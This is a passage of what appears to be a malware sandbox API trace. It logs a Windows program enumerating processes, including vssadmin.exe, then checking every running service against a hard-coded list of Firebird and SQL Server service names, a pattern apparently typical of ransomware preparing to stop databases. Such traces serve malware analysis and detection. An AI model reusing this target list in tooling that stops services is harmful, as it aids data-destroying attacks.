th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0175.761] lstrlenW (lpString="dllhost.exe") returned 11 [0175.761] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0175.762] lstrlenW (lpString="vssadmin.exe") returned 12 [0175.762] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0175.763] CloseHandle (hObject=0x544) returned 1 [0175.763] Sleep (dwMilliseconds=0x1f4) [0176.285] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c268 [0176.286] EnumServicesStatusExW (in: hSCManager=0x458c268, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0176.286] GetLastError () returned 0xea [0176.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x4601700 [0176.287] EnumServicesStatusExW (in: hSCManager=0x458c268, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4601700, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4601700, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0176.288] CloseServiceHandle (hSCObject=0x458c268) returned 1 [0176.288] lstrlenW (lpString="Appinfo") returned 7 [0176.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0176.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0176.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0176.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0176.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0176.288] lstrlenW (lpString="AppXSvc") returned 7 [0176.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0176.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0176.288] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0176.288] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0176.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0176.288] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0176.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0176.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0176.288] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0176.289] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0176.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0176.289] lstrlenW (lpString="Audiosrv") returned 8 [0176.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0176.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0176.289] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0176.289] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0176.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0176.289] lstrlenW (lpString="BFE") returned 3 [0176.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0176.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0176.289] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0176.289] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0176.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0176.289] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0176.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0176.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0176.289] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0176.289] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0176.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0176.289] lstrlenW (lpString="CDPSvc") returned 6 [0176.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0176.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0176.289] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0176.289] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0176.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0176.290] lstrlenW (lpString="ClickToRunSvc") returned 13 [0176.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0176.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0176.290] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0176.290] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0176.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0176.290] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0176.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0176.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0176.290] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0176.290] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0176.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0176.290] lstrlenW (lpString="CryptSvc") returned 8 [0176.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0176.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0176.290] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0176.290] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0176.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0176.290] lstrlenW (lpString="DcomLaunch") returned 10 [0176.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0176.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0176.290] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0176.290] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0176.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0176.290] lstrlenW (lpString="DeviceAssociationService") returned 24 [0176.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0176.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0176.291] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0176.291] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0176.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0176.291] lstrlenW (lpString="Dhcp") returned 4 [0176.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0176.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0176.291] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0176.291] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0176.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0176.291] lstrlenW (lpString="Dnscache") returned 8 [0176.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0176.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0176.291] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0176.291] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0176.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0176.291] lstrlenW (lpString="DPS") returned 3 [0176.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0176.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0176.291] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0176.291] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0176.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0176.291] lstrlenW (lpString="DusmSvc") returned 7 [0176.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0176.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0176.291] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0176.291] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0176.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0176.292] lstrlenW (lpString="EventLog") returned 8 [0176.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0176.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0176.292] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0176.292] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0176.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0176.292] lstrlenW (lpString="EventSystem") returned 11 [0176.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0176.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0176.292] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0176.292] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0176.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0176.292] lstrlenW (lpString="FontCache") returned 9 [0176.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0176.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0176.292] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0176.292] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0176.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0176.292] lstrlenW (lpString="gpsvc") returned 5 [0176.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0176.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0176.292] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0176.292] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0176.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0176.292] lstrlenW (lpString="iphlpsvc") returned 8 [0176.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0176.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0176.293] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0176.293] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0176.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0176.293] lstrlenW (lpString="KeyIso") returned 6 [0176.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0176.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0176.293] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0176.293] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0176.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0176.293] lstrlenW (lpString="LanmanServer") returned 12 [0176.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0176.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0176.293] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0176.293] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0176.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0176.293] lstrlenW (lpString="LanmanWorkstation") returned 17 [0176.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0176.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0176.293] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0176.293] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0176.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0176.293] lstrlenW (lpString="lfsvc") returned 5 [0176.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0176.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0176.293] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0176.294] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0176.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0176.294] lstrlenW (lpString="lmhosts") returned 7 [0176.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0176.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0176.294] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0176.294] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0176.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0176.294] lstrlenW (lpString="LSM") returned 3 [0176.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0176.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0176.294] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0176.294] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0176.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0176.294] lstrlenW (lpString="MpsSvc") returned 6 [0176.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0176.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0176.294] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0176.294] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0176.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0176.294] lstrlenW (lpString="NcbService") returned 10 [0176.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0176.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0176.294] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0176.294] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0176.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0176.294] lstrlenW (lpString="netprofm") returned 8 [0176.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0176.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0176.295] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0176.295] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0176.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0176.295] lstrlenW (lpString="NgcSvc") returned 6 [0176.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0176.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0176.295] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0176.295] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0176.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0176.295] lstrlenW (lpString="NlaSvc") returned 6 [0176.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0176.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0176.295] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0176.295] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0176.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0176.295] lstrlenW (lpString="nsi") returned 3 [0176.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0176.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0176.295] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0176.295] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0176.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0176.295] lstrlenW (lpString="PcaSvc") returned 6 [0176.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0176.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0176.295] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0176.296] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0176.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0176.296] lstrlenW (lpString="PlugPlay") returned 8 [0176.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0176.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0176.296] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0176.296] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0176.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0176.296] lstrlenW (lpString="Power") returned 5 [0176.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0176.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0176.296] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0176.296] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0176.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0176.296] lstrlenW (lpString="ProfSvc") returned 7 [0176.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0176.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0176.296] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0176.296] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0176.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0176.296] lstrlenW (lpString="RpcEptMapper") returned 12 [0176.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0176.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0176.296] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0176.296] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0176.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0176.296] lstrlenW (lpString="RpcSs") returned 5 [0176.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0176.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0176.297] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0176.297] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0176.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0176.297] lstrlenW (lpString="SamSs") returned 5 [0176.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0176.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0176.297] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0176.297] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0176.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0176.297] lstrlenW (lpString="Schedule") returned 8 [0176.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0176.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0176.297] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0176.297] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0176.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0176.297] lstrlenW (lpString="SecurityHealthService") returned 21 [0176.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0176.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0176.297] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0176.297] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0176.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0176.297] lstrlenW (lpString="SENS") returned 4 [0176.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0176.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0176.298] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0176.298] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0176.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0176.298] lstrlenW (lpString="ShellHWDetection") returned 16 [0176.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0176.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0176.298] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0176.298] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0176.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0176.298] lstrlenW (lpString="Spooler") returned 7 [0176.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0176.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0176.298] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0176.298] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0176.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0176.298] lstrlenW (lpString="StateRepository") returned 15 [0176.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0176.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0176.298] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0176.298] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0176.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0176.298] lstrlenW (lpString="SysMain") returned 7 [0176.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0176.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0176.298] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0176.298] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0176.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0176.298] lstrlenW (lpString="SystemEventsBroker") returned 18 [0176.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0176.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0176.299] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0176.299] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0176.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0176.299] lstrlenW (lpString="Themes") returned 6 [0176.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0176.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0176.316] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0176.316] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0176.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0176.316] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0176.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0176.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0176.317] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0176.317] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0176.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4601700 | out: hHeap=0x6a0000) returned 1 [0176.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x530 [0176.321] Process32FirstW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.321] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, 